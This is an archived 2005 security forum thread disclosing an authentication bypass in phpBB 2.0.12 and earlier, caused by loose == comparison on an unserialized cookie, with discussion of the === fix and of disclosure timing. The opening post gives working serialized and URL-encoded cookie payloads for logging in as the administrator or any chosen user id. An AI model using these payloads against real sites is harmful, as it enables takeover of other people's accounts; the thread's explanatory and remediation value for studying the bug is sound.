Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 21, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 197
Members: 0
Total: 197
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpbb v. 2.0.12 and earlier authendication bypass Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
phpbb v. 2.0.12 and earlier authendication bypass
PostPosted: Sat Feb 26, 2005 11:20 pm Reply with quote
Heintz
Valuable expert
Valuable expert
 
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




Bug author: Heintz (Henno Joosep)
Related site: http://www.waraxe.us
Date of finding: 24.02.2005

problem is in sessions.php which is in /includes catalog.

$sessiondata = isset($HTTP_COOKIE_VARS[$cookiename . '_data']) ? unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data'])) : array();

here we see an array unserialized

if( $sessiondata['autologinid'] == $auto_login_key )
{
// autologinid matches password
$login = 1;
$enable_autologin = 1;
}


problem is with if() using == operator which considers the statement
true if one side is boolean(true), and that we can achive by unserializing
a bool instead of empty string.

exploitation:
this can be normal admin session cookie.
a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"2";}

attacker would make array with autologinid as key to boolean(tru) so:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

to this to work in real situation it must be urlencoded, and this is how it should look like to
obtain a user with id 2 (usually admin):
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D


to change the users id bigger, change the
number in end,

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"7";}

if dealing with higher ids you must specify s:N (N as how many decimal places id has)
example below:

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:4:"1234";}

i stated using "===" as contitional operator as a "quick fix", which phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).

originaly i tryed/explored advantages to use unserialize
to unserialize database objects, but using objects as arrays creates fatal error
(possible full path disclosure???).

Notes:
software authors decided to not to credit me cause i posted info public,
not giving them enought time,

-- brought up --


Last edited by Heintz on Sat Apr 09, 2005 5:46 pm; edited 4 times in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sun Feb 27, 2005 3:32 pm Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




Smile Very Happy full test and work perfect exellent work
View user's profile Send private message Visit poster's website
PostPosted: Sun Feb 27, 2005 5:28 pm Reply with quote
Injector
Active user
Active user
 
Joined: Dec 29, 2004
Posts: 49




i decoded both and tried to analyze it but still i dont get how to do it. What if I dont want user id 2 what if I want user id 7. How do i do such?
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 12:31 am Reply with quote
Grullanetx
Beginner
Beginner
 
Joined: Feb 18, 2005
Posts: 2




Hi all!

phpBB 2.0.13 released - Critical Update

path disclosure bug in viewtopic.php fixed too!

Saludos!
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 4:37 am Reply with quote
Exoduks
Beginner
Beginner
 
Joined: Jan 12, 2005
Posts: 3




Does anyone now how to exploit this session hendeling bug ?
View user's profile Send private message Visit poster's website
PostPosted: Mon Feb 28, 2005 5:13 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




hum, nice research youve done there

ive try to download that version, but the development team allready update it Smile

now i try a new one (2.0.13)

long time no play with PHPbb Smile (eventhough my forum ise it too Sad )

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
For comparing Strings use ===
PostPosted: Mon Feb 28, 2005 8:40 am Reply with quote
Zeelock
Active user
Active user
 
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




Heintz Great Job.

Even if it's a common trick and well documented I didn't notice it yet ( Shocked ).

This error is very common in converting perl scripts into php.

For more info:

http://www.php.net/manual/it/language.operators.comparison.php

Quote:
jwhiting at hampshire dot edu
09-Dec-2003 06:31
note: the behavior below is documented in the appendix K about type comparisons, but since it is somewhat buried i thought i should raise it here for people since it threw me for a loop until i figured it out completely.

just to clarify a tricky point about the == comparison operator when dealing with strings and numbers:

('some string' == 0) returns TRUE

however, ('123' == 0) returns FALSE

also note that ((int) 'some string') returns 0

and ((int) '123') returns 123

the behavior makes senes but you must be careful when comparing strings to numbers, e.g. when you're comparing a request variable which you expect to be numeric. its easy to fall into the trap of:

if ($_GET['myvar']==0) dosomething();

as this will dosomething() even when $_GET['myvar'] is 'some string' and clearly not the value 0

i was getting lazy with my types since php vars are so flexible, so be warned to pay attention to the details...


Exploit n. 2 Censored.....


Last edited by Zeelock on Mon Feb 28, 2005 1:54 pm; edited 6 times in total

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 10:37 am Reply with quote
sygma
Regular user
Regular user
 
Joined: Nov 21, 2004
Posts: 7




why was the info censored ? could someone please PM the info ? thanks.

_________________
[i]no word to save thee[/i]
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 11:03 am Reply with quote
Zeelock
Active user
Active user
 
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




I think that Janek censored the message, because it's really harmful at the moment

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Mon Feb 28, 2005 1:51 pm Reply with quote
Heintz
Valuable expert
Valuable expert
 
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




i was the one censoring it, cause phpbb guys didn't like the idea posting before/same time about the issue.

and i would appreciate if we do not provide explotation info in some ammount of time (2 days).

i thought of better of people but it seems there just too many script kiddies outside who start making damage whenever possible. Sad


http://www.phpbb.com/phpBB/viewtopic.php?t=267563


Last edited by Heintz on Mon Feb 28, 2005 3:37 pm; edited 1 time in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Feb 28, 2005 1:53 pm Reply with quote
Zeelock
Active user
Active user
 
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




If you want I'll censor the info as well

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Thu Mar 03, 2005 1:05 pm Reply with quote
Heintz
Valuable expert
Valuable expert
 
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




---move---

Notes:
software authors decided to not to credit me cause i posted info public,
not giving them enought time,


Last edited by Heintz on Wed May 04, 2005 1:26 am; edited 2 times in total

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Thu Mar 03, 2005 2:23 pm Reply with quote
lone_wolf
Regular user
Regular user
 
Joined: Feb 20, 2005
Posts: 9




Heintz, what exactly triple equal from "quick fix" do? Is there some way to cheat it?
View user's profile Send private message
PostPosted: Thu Mar 03, 2005 2:39 pm Reply with quote
lone_wolf
Regular user
Regular user
 
Joined: Feb 20, 2005
Posts: 9




This looks pritty hopeless (from "Boolean - manual):


/* Note the triple equal sign, this is the "exactly equal to" operator,
which checks NOT JUST FOR EQUALITY, BUT FOR TYPE. Using it
ensures that $bool doesn't get converted to a boolean
for the comparison: $bool===true is only true
if $bool is a true boolean, whereas $bool==true
is true for any non-empty string (except "0").
*/
View user's profile Send private message
PostPosted: Sun Mar 13, 2005 4:42 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




Heintz wrote:

<-- message truncated --->

i stated using "===" as contitional operator as a "quick fix", which phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).

originaly i tryed/explored advantages to use unserialize
to unserialize database objects, but using objects as arrays creates fatal error
(possible full path disclosure???).

Notes:
software authors decided to not to credit me cause i posted info public,
thus not giving them enought time (big mistake by me), and therefore there may be stealers
claiming the bug to be theyrs.


have another way to fix it, coz i found the same error as you do

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
phpbb v. 2.0.12 and earlier authendication bypass
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






ATI Radeon reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.071 Seconds